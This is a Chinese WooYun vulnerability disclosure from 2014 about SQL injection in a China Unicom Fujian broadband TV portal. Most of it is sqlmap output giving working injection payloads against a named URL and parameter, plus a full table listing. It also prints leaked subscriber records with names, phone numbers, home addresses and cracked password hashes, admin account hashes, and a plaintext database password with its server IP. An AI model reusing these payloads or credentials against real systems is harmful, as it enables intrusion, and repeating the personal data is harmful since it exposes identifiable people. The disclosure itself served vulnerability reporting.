当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081692

漏洞标题:中国联通某宽带数字家庭网站SQL注入(泄露114W条用户记录包含账号密码)

相关厂商:中国联通

漏洞作者: 路人甲

提交时间:2014-11-02 10:04

修复时间:2014-12-17 10:06

公开时间:2014-12-17 10:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-02: 细节已通知厂商并且等待厂商处理中
2014-11-03: 厂商已经确认,细节仅向厂商公开
2014-11-13: 细节向核心白帽子及相关领域专家公开
2014-11-23: 细节向普通白帽子公开
2014-12-03: 细节向实习白帽子公开
2014-12-17: 细节向公众公开

简要描述:

没错就是不是11W是114W!

详细说明:

网址为:http://fjportal.vcomlive.com/
页面底部显示该网站为
福建联通宽带数字家庭 河南网视传媒有限公司 郑州威科姆科技股份有限公司 联合运营
注入点:
随便点开一个节目,链接http://fjportal.vcomlive.com/play/play.php?id=LBQG1120572
id参数存在注入
SQLMAP 

sqlmap identified the following injection points with a total of 205 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=LBQG1120572' AND 6594=6594 AND 'vkEP'='vkEP
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=LBQG1120572' AND (SELECT 3565 FROM(SELECT COUNT(*),CONCAT(0x7162707971,(SELECT (CASE WHEN (3565=3565) THEN 1 ELSE 0 END)),0x7173637671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LXuR'='LXuR
    Type: UNION query
    Title: MySQL UNION query (NULL) - 60 columns
    Payload: id=-6386' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162707971,0x6f6a724865474f786170,0x7173637671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: id=-8719' OR 5082=SLEEP(5) AND 'GCJr'='GCJr
---
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
current database:    'Portal'
current user is DBA:    False
available databases [3]:
[*] information_schema
[*] Portal
[*] test
Database: Portal
[193 tables]
+---------------------------------------+
| FJtoCRI_imgUP                         |
| FJtoCRI_mv                            |
| KS_RES                                |
| RES_KNOWLEDGE_XLZG                    |
| SHARE_KNOWLEDGE_STRUCTURE             |
| 17_10_mpeg_list                       |
| 17_1_mpeg_list                        |
| 17_2_mpeg_list                        |
| 17_3_mpeg_list                        |
| 17_4_mpeg_list                        |
| 17_5_mpeg_list                        |
| 17_6_mpeg_list                        |
| 17_7_mpeg_list                        |
| 17_8_mpeg_list                        |
| 17_9_mpeg_list                        |
| language                              |
| a_log                                 |
| a_pass_err                            |
| a_pass_err1                           |
| ad_channelad                          |
| ad_policy                             |
| ad_policymovie                        |
| area_info                             |
| area_mpeg_relation                    |
| business_application                  |
| business_img                          |
| business_menu                         |
| business_property                     |
| business_server_info                  |
| business_use_type                     |
| channel_list                          |
| channel_list_content                  |
| channel_teleplay                      |
| check_config                          |
| dhcp_config                           |
| diskmpeg_unusemovie                   |
| diskmpeg_unusempeg                    |
| distributespeed                       |
| dns_template                          |
| genre                                 |
| image                                 |
| image_config                          |
| image_preview                         |
| image_purpose                         |
| imgtype                               |
| iptable                               |
| key_info                              |
| layout_image                          |
| litv_channel                          |
| litv_program                          |
| logo                                  |
| logo_terminalversion_bussiness        |
| lvs_config                            |
| menu_image                            |
| menu_movie                            |
| menu_mpeg                             |
| menu_mpeg_tempt                       |
| menu_teleplay                         |
| movieType                             |
| movie_appraisal                       |
| movie_down                            |
| movie_down_path                       |
| movies                                |
| movies_segment                        |
| moviesparam                           |
| mpeg_list                             |
| mpeg_list_contrast                    |
| mpeg_list_garbage                     |
| mpeg_list_tmp                         |
| mpeg_list_vcominfodel                 |
| mpeg_subsection                       |
| mtmp                                  |
| muxtype                               |
| near_area_list                        |
| net_mpeg_list_contrast                |
| new_update_movie                      |
| orders                                |
| origin                                |
| portal_status                         |
| power_ad                              |
| power_ad_img                          |
| power_ad_terminalversion_bussiness    |
| private_elem                          |
| private_group_info                    |
| private_menu                          |
| product_info                          |
| product_service_info                  |
| program_format                        |
| rating                                |
| rec_download_info                     |
| rec_server                            |
| record_programme                      |
| server_channel_list                   |
| server_channel_list_tmp               |
| service_movie                         |
| share                                 |
| share_server                          |
| show_kind                             |
| show_menu_type                        |
| squid_server                          |
| standard_layout                       |
| standard_layout_element               |
| standard_menu                         |
| standard_menu_servicecode             |
| stb_login_record                      |
| stb_update_log                        |
| stb_update_plan                       |
| stb_update_result                     |
| stb_update_verinfo                    |
| stb_upgrade_server                    |
| sub_product                           |
| sub_status_rec                        |
| sub_terminal                          |
| sub_update_check                      |
| sub_welcome_info                      |
| subscriber                            |
| subscriber_area_bind                  |
| subscriber_mac_bind                   |
| subscriber_update_password            |
| sys_data_change                       |
| sys_data_change_task                  |
| sys_data_sync_plan                    |
| sys_log                               |
| sys_mem_server                        |
| sys_para                              |
| teleplay                              |
| teleplayType                          |
| teleplay_appraisal                    |
| teleplay_movie                        |
| teleplayparam                         |
| temp_imagely                          |
| terminal_type                         |
| terminal_version                      |
| tmp13745_1331714671_100118401         |
| tmp14769_1333095596_1304181233        |
| tmp15445_1339150102_1583395861        |
| tmp15815_1339985671_1433755063        |
| tmp18236_1354004741_954412442         |
| tmp22971_1339987542_1501512556        |
| tmp22971_1339987917_2036377457        |
| tmp24367_1346666299_566833485         |
| tmp24384_1339150528_868540780         |
| tmp24889_1339150553_1857535896        |
| tmp24988_1328064193_2079492051        |
| tmp26065_1340099129_1194820177        |
| tmp26065_1340099480_716882780         |
| tmp415_1375412218_383871281           |
| tmp415_1375412226_903953738           |
| tmp415_1375412227_2053835275          |
| tmp415_1375412230_825013410           |
| tmp415_1375412233_2018101676          |
| tmp415_1375412236_316861279           |
| tmp415_1375412237_626735183           |
| tmp415_1375412237_97842698            |
| tmp415_1375412239_1049705866          |
| tmp415_1375412239_245650000           |
| tmp415_1375412239_570577339           |
| tmp415_1375412240_751796636           |
| tmp415_1375412241_1385265633          |
| tmp4769_1357029751_1253732955         |
| tmp4769_1357029753_84902856           |
| tmp4769_1357029757_2071240884         |
| tmp4769_1357029761_1926550523         |
| tmp4769_1357029765_1700742570         |
| tmp4769_1357029766_196773747          |
| tmp4769_1357029767_629723364          |
| tmp4769_1357029768_874953831          |
| tmp4769_1357029769_21601231           |
| tmp4769_1357029769_242942854          |
| tmp4769_1357029770_1237987098         |
| tmp4769_1357029772_2007113618         |
| tmp5389_1375412614_1278048970         |
| tmp5389_1375412622_1064652119         |
| tmp5389_1375412627_310855987          |
| tmp5389_1375412630_1742474077         |
| tmp5389_1375412633_196863473          |
| tmp5389_1375412634_544531639          |
| tmp5389_1375412634_796192373          |
| tmp5389_1375412636_501378703          |
| tmp5389_1375412636_513621861          |
| tmp5389_1375412638_135840808          |
| tmp8937_1324284293_1754020834         |
| tmp8937_1324284428_1832489117         |
| top_menu_pv                           |
| top_movie_pv                          |
| top_teleplay_appraisal                |
| union_server                          |
| unuse_movies                          |
| update_server_result                  |
| userinfo                              |
| video_format                          |
| video_server                          |
| xlzg_zy                               |
+---------------------------------------+


来看一下表记录数

Database: Portal
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| sub_terminal                       | 1142859 |
| subscriber                         | 1142370 |
| image_preview                      | 221940  |
| stb_login_record                   | 183306  |
| mpeg_list                          | 139214  |
| image                              | 134678  |
| mpeg_list_contrast                 | 133416  |
| movies                             | 114600  |
| menu_mpeg                          | 113708  |
| sub_product                        | 105298  |
| moviesparam                        | 97854   |
| a_pass_err                         | 38990   |
| virtualmovie                       | 30881   |
| `17_6_mpeg_list`                   | 29139   |
| `17_8_mpeg_list`                   | 26555   |
| `17_1_mpeg_list`                   | 24876   |
| `17_5_mpeg_list`                   | 23402   |
| `17_2_mpeg_list`                   | 21502   |
| mpeg_list_vcominfodel              | 19201   |
| sub_status_rec                     | 17943   |
| sys_log                            | 12867   |
| subscriber_update_password         | 7608    |
| tmp26065_1340099129_1194820177     | 5771    |
| tmp22971_1339987542_1501512556     | 5770    |
| tmp4769_1357029742_2139185939      | 5557    |
| standard_menu                      | 5270    |
| FJtoCRI_mv                         | 5206    |
| FJtoCRI_imgUP                      | 4367    |
| menu_image                         | 3841    |
| tmp415_1375412233_2018101676       | 3507    |
| tmp5389_1375412630_1742474077      | 3507    |
| tmp4769_1357029761_1926550523      | 3480    |
| stb_update_log                     | 3419    |
| menu_movie                         | 3348    |
| tmp4769_1357029757_2071240884      | 3317    |
| tmp4769_1357029753_84902856        | 3299    |
| tmp5389_1375412623_650748860       | 3261    |
| standard_menu_servicecode          | 2964    |
| tmp8937_1324284293_1754020834      | 2899    |
| tmp415_1375412230_825013410        | 2848    |
| tmp5389_1375412627_310855987       | 2848    |
| movie_appraisal                    | 2837    |
| teleplayparam                      | 2637    |
| teleplay                           | 2335    |
| a_log                              | 1953    |
| genre                              | 1897    |
| tmp14769_1333095596_1304181233     | 1815    |
| tmp24988_1328064193_2079492051     | 1684    |
| tmp24367_1346666299_566833485      | 1664    |
| tmp415_1375412240_751796636        | 1631    |
| tmp5389_1375412637_2065803658      | 1631    |
| tmp4769_1357029770_1237987098      | 1625    |
| tmp13745_1331714671_100118401      | 1507    |
| tmp26065_1340099480_716882780      | 1476    |
| area_info                          | 1467    |
| tmp22971_1339987917_2036377457     | 1418    |
| tmp24384_1339150528_868540780      | 1394    |
| xlzg_zy                            | 1249    |
| tmp24889_1339150553_1857535896     | 1232    |
| private_elem                       | 1000    |
| tmp415_1375412237_97842698         | 994     |
| tmp5389_1375412634_796192373       | 994     |
| tmp4769_1357029767_629723364       | 993     |
| tmp4769_1357029751_1253732955      | 887     |
| business_server_info               | 883     |
| tmp415_1375412226_903953738        | 878     |
| tmp5389_1375412622_1064652119      | 878     |
| menu_teleplay                      | 851     |
| a_pass_err1                        | 849     |
| tmp15445_1339150102_1583395861     | 778     |
| channel_teleplay                   | 729     |
| server_channel_list                | 723     |
| top_teleplay_pv                    | 619     |
| standard_layout_element            | 545     |
| channel_list_content               | 404     |
| tmp15815_1339985671_1433755063     | 340     |
| tmp8937_1324284428_1832489117      | 300     |
| business_menu                      | 264     |
| product_service_info               | 264     |
| tmp415_1375412236_316861279        | 264     |
| tmp5389_1375412633_196863473       | 264     |
| layout_image                       | 255     |
| tmp4769_1357029765_1700742570      | 249     |
| area_mpeg_relation                 | 132     |
| movieType                          | 126     |
| tmp18236_1354004741_954412442      | 109     |
| power_ad_terminalversion_bussiness | 102     |
| unuse_movies                       | 98      |
| video_format                       | 96      |
| mtmp                               | 93      |
| temp_imagely                       | 88      |
| private_group_info                 | 78      |
| litv_channel                       | 74      |
| show_menu_type                     | 74      |
| tmp415_1375412239_245650000        | 74      |
| tmp4769_1357029769_242942854       | 74      |
| tmp415_1375412237_626735183        | 72      |
| tmp5389_1375412634_544531639       | 72      |
| near_area_list                     | 53      |
| standard_layout                    | 43      |
| RES_KNOWLEDGE_XLZG                 | 39      |
| power_ad_img                       | 33      |
| business_property                  | 30      |
| business_application               | 29      |
| business_img                       | 24      |
| share_server                       | 23      |
| teleplay_appraisal                 | 23      |
| stb_update_verinfo                 | 21      |
| stb_upgrade_server                 | 18      |
| iptable                            | 14      |
| `user`                             | 13      |
| channel_list                       | 13      |
| top_movie_appraisal                | 12      |
| program_format                     | 11      |
| key_info                           | 10      |
| power_ad                           | 10      |
| sys_para                           | 10      |
| top_teleplay_appraisal             | 9       |
| muxtype                            | 8       |
| origin                             | 6       |
| private_menu                       | 6       |
| product_info                       | 6       |
| tmp415_1375412239_570577339        | 6       |
| tmp4769_1357029768_874953831       | 6       |
| tmp5389_1375412636_513621861       | 6       |
| rating                             | 5       |
| share                              | 5       |
| teleplayType                       | 5       |
| image_purpose                      | 4       |
| sys_data_sync_plan                 | 4       |
| union_server                       | 4       |
| update_server_result               | 4       |
| imgtype                            | 3       |
| sys_mem_server                     | 3       |
| terminal_type                      | 3       |
| terminal_version                   | 3       |
| `language`                         | 2       |
| business_use_type                  | 2       |
| orders                             | 2       |
| squid_server                       | 2       |
| subscriber_mac_bind                | 2       |
| check_config                       | 1       |
| dhcp_config                        | 1       |
| distributespeed                    | 1       |
| dns_template                       | 1       |
| image_config                       | 1       |
| lvs_config                         | 1       |
| mpeg_list_garbage                  | 1       |
| portal_status                      | 1       |
| show_kind                          | 1       |
| tmp415_1375412239_1049705866       | 1       |
| tmp5389_1375412636_501378703       | 1       |
+------------------------------------+---------+


subscriber 用户记录数有114W,而且有账号密码

Database: Portal                                                               
Table: subscriber
[19 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| address     | text         |
| area_code   | varchar(64)  |
| business_id | int(11)      |
| chargetype  | varchar(64)  |
| cl_type     | int(11)      |
| email       | varchar(64)  |
| end_time    | varchar(16)  |
| id          | int(11)      |
| locked      | tinyint(1)   |
| mobile      | varchar(64)  |
| name        | varchar(64)  |
| net_account | varchar(64)  |
| net_type    | int(11)      |
| nickname    | varchar(64)  |
| password    | varchar(255) |
| phone       | varchar(32)  |
| start_time  | int(10)      |
| tname       | varchar(64)  |
| update_flag | int(1)       |
+-------------+--------------+


找几条看看

189	27	59791020019	林小燕	<blank>	<blank>	0	NULL	1	中国联通连城分公司营业厅	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59791020019	17.8.10.2.	1252544121	0	1	59791020019
190	27	59591020010	曾惠霞	15605956228	<blank>	0	NULL	1	泉州联通东门营业厅	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59591020010	17.5.6.	1252631833	A	1	59591020010
191	27	59591020011	王青青	15605957987	<blank>	0	NULL	1	泉州惠安崇武经营部	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59591020011	17.5.6.	1252631993	A	1	59591020011
192	27	59591020012	王慧霞	15605956659	<blank>	0	NULL	1	泉州惠安瑞安营业厅	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59591020012	17.5.6.	1252632114	A	1	59591020012
193	27	59591020013	赵莉莉	15605957768	<blank>	0	NULL	1	泉州联通泉安营业厅	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59591020013	17.5.12.	1252632297	A	1	59591020013
194	27	59591020014	唐巧娜	<blank>	<blank>	0	NULL	1	泉州 市 泉港 县区市 海天广场联通营业厅	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59591020014	17.5.5.	1252895776	A	1	59591020014
195	27	59291020010	黄梅	<blank>	<blank>	0	NULL	1	厦门 市 同安 县区市 环东海域美溪道47号楼335号	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59291020010	17.2.6.	1252914142	A	1	59291020010
196	27	59491020016	范剑雄	<blank>	<blank>	0	NULL	1	莆田市城厢区后巷街30号B栋502室	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020016	17.3.4.	1252981369	A	1	59491020016
197	27	59491020017	陈瑞雄	<blank>	<blank>	0	NULL	1	城厢区凤凰山综合小区20栋602号(华天酒店后门)	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020017	17.3.4.	1252981489	A	1	59491020017
198	27	59491020018	陈静	<blank>	<blank>	0	NULL	1	莆田市九五医院宿舍楼	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020018	17.3.4.	1252981589	A	1	59491020018
199	27	59491020019	黄丽琴	<blank>	<blank>	0	NULL	1	莆田市黄石镇街道	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020019	17.3.4.	1252981690	A	1	59491020019
200	27	59491020020	陈丽君	<blank>	<blank>	0	NULL	1	福建省莆田市涵江区梧塘镇溪游村下村103号	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020020	17.3.4.	1252981910	A	1	59491020020
201	27	59491020021	范剑雄	<blank>	<blank>	0	NULL	1	莆田市城厢区后巷街30号B栋502室	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020021	17.3.4.	1252982331	A	1	59491020021
203	27	59491020023	陈静	<blank>	<blank>	0	NULL	1	莆田市九五医院宿舍楼	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020023	17.3.4.	1252982492	A	1	59491020023
204	27	59491020024	黄丽琴	<blank>	<blank>	0	NULL	1	莆田市黄石镇街道	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020024	17.3.4.	1252982552	A	1	59491020024
205	27	59491020025	陈丽君	<blank>	<blank>	0	NULL	1	福建省莆田市涵江区梧塘镇溪游村下村103号	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020025	17.3.3.	1252982632	A	1	59491020025
206	27	59491020026	范剑雄	<blank>	<blank>	0	NULL	1	莆田市荔城区丰美路666号	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020026	17.3.4.	1252982712	A	1	59491020026
207	27	59491020027	陈瑞雄	<blank>	<blank>	0	NULL	1	莆田市荔城区丰美路666号	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020027	17.3.4.	1252982793	A	1	59491020027
208	27	59491020028	陈静	<blank>	<blank>	0	NULL	1	莆田市荔城区丰美路666号	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020028	17.3.4.	1252982853	A	1	59491020028
209	27	59491020029	黄丽琴	<blank>	<blank>	0	NULL	1	莆田市荔城区丰美路666号	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020029	17.3.4.	1252982913	A	1	59491020029


随便找两个用户登录下

1.png


3.png


但是点进去之后发现非法IP

2.png


貌似账号绑定IP?
没明白就没继续测试了
然后在找了找

Database: Portal
Table: userinfo
[4 entries]
+----+--------------+--------+---------+---------+----------+----------+----------------------------------+
| id | tele         | is_sso | purview | address | username | truename | password                         |
+----+--------------+--------+---------+---------+----------+----------+----------------------------------+
| 1  | 0            | 0      | 15      | 0       | admin    | admin    | 88f10d639863b00bfc885ab1b88441a9 |
| 2  | 059138288288 | 0      | 15      | 福建办事处   | fjbsc    | 福建办事处    | e9f6f0e31308c741c9a02867eabefd5a |
| 3  | 0            | 0      | 15      | <blank> | kwbksy   | 高翔       | ce6f4aae92cf678e4204d7a737293401 |
| 9  | 156371       | 0      | 15      | <blank> | kw       | 播控值班     | 5de19cdb3da2afdd14f0bd868f790b74 |
+----+--------------+--------+---------+---------+----------+----------+----------------------------------+


貌似是后台管理员账号密码,但是没找到后台登录地址,放弃
最后又找到数据库配置信息

Database: Portal
Table: portal_status
[1 entry]
+---------+------------------+--------------+
| db_user | db_passwd        | portal_ip    |
+---------+------------------+--------------+
| content | content_19990908 | 58.22.63.202 |
+---------+------------------+--------------+


然后去扫了下IP 58.22.63.202 的端口,发现3306端口开放,可以远程连接MYSQL

1115.jpg


可以直接拖库了!
就挖打这里了,rank看着给吧

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-11-03 11:29

厂商回复:

最新状态:

暂无